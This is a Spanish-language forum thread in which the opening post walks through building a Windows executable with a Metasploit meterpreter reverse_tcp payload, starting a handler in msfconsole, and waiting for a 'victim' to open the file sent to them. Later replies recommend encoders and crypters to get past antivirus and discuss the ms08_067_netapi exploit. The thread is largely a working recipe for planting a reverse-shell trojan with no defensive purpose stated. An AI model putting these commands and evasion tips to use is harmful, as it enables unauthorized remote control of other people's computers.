Título: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: Shell Root en 30 Diciembre 2009, 02:32 am Generando Ejecutable con PAYLOAD [Metasploit By: Shell Root] Despues de explotar la vulnerabilidad en sistemas Windows XP SP 2 [445/tcp "Microsoft Windows XP microsoft-ds"] con el exploit exploit/windows/smb/ms08_067_netapi. Ahora veremos como obtener una session del Meterpreter cuando la Primero generamos el ejecutable con el PAYLOAD windows/meterpreter/reverse_tcp. Así, desde la Shell de Linux: Código: shell@ShellRoot:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=5555 X > /home/shell/hola.exe Nota: Me toco hacerlo desde Linux porque en W1nd0w$, no me funco el parametro X >. Ahora revizamos la ruta /home/shell/hola.exe y miramos que existe el archivo. (http://img63.imageshack.us/img63/900/holaexe.th.png) (http://img63.imageshack.us/i/holaexe.png/) Mandamos el archivo a la Código: shell@ShellRoot:~/msf3$ ./msfconsole Cabe decir de que debemos de configurar de nuevo el PAYLOAD puesto dentro de archivo ejecutable que creamos al inicio (hola.exe), ponemos los mismos datos. Así: Código: msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp Ahora es tiempo de ejecutar nuestro Auxiliary. Pero ejecutarémos digamos que en un "segundo plano", a la espera de que la victima abra el ejecutable que le mandamos. Así: Código: msf exploit(handler) > exploit -j Ahora es cuestion de esperar a que la victima abra el archivo y obtendrémos la session del Meterpreter. Supongamos que pasaron varios minutos y que la victima abrio el archivo, nos debe de aparecer esto: Código: msf exploit(handler) > [*] Sending stage (723456 bytes) By: Shell Root Fuente: http://shellrootsecurity.blogspot.com/2009/12/generando-ejecutable-con-payload.html Video: Nothing... Saludos! Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: xopito en 17 Abril 2010, 03:31 am que buena pinta tiene, le echaré un vistazo
Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: tragantras en 17 Abril 2010, 14:44 pm jajaja apliquese el "más vale tarde que nunca"
Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: l1vv3r en 18 Abril 2010, 22:14 pm Detectan los antivirus de windows el payload del ejecutable?
Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: Shell Root en 18 Abril 2010, 22:25 pm Supongo que algunos lo detectarán, pero para eso estan los encoders!
Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: l1vv3r en 18 Abril 2010, 22:28 pm Gracias por la rápida respuesta.
Me pongo a mirar lo de los encoders!!! Recomiendas alguno?? Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: manel92 en 27 Abril 2010, 14:20 pm el exploit ms08_067_netapi que yo sepa da reverse shell
para que esperar a que ejecute el archivo si lo podemos hacer nosotros? Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: alexkof158 en 27 Abril 2010, 18:41 pm el exploit ms08_067_netapi que yo sepa da reverse shell pues por si la victima tiene ya corregido este error se le manda un ejectuble, apenas lo abra bummmmmmmmmmmpara que esperar a que ejecute el archivo si lo podemos hacer nosotros? (http://www.grantchronicles.com/big.bang.jpg) PD: Si el av lo detecta usa cripters o los encoders del MSF,,,,, Saludos :D Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: b10s_0v3rr1d3 en 28 Abril 2010, 00:12 am el exploit ms08_067_netapi que yo sepa da reverse shell para que esperar a que ejecute el archivo si lo podemos hacer nosotros? dicho fallo tiene ya time, si que aun se pueden ver sistemas con ese fallo pero no tendria que ser normal verlos con tanta facilidad a estas alturas.. Título: Re: [Metasploit] Generando Ejecutable con PAYLOAD Publicado por: piper_maru en 2 Mayo 2010, 13:01 pm Buenas, lo he hecho tal y como se explica, pero al ejecutar el .exe no se me abre la shell en el pc atacante, puede ser por el AV o firewall, auunq los he desactivado y sigue sin recibir el reverse.
|